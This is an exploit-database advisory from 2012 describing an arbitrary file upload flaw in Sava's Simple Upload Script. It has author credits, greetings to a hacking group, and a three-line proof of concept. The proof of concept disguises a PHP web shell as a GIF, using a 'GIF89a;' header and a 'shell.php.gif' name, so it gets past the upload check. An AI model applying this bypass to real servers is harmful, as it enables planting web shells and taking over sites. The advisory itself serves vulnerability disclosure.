Sava’s Simple Upload Script / Arbitrary File Upload



EKU-ID: 2409 CVE: OSVDB-ID:
Author: Daniel Godoy Published: 2012-07-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Sava’s Simple Upload Script / Arbitrary File Upload
# Date: 03/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://savasplace.com/wp-content/plugins/downloads-manager/upload/upload.tgz
# Tested on: Linux
#
# www.chap.cl
# Este Advisory fue descubierto por Daniel Godoy, integrante de Project CHAP Security
# be secured / stay secure
# contacto@chap.cl


[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
 
[PoC]
add GIF89a; and rename your php file whit name: shell.php.gif
http://localhost/upload.php
http://locahost/files/shell.php.gif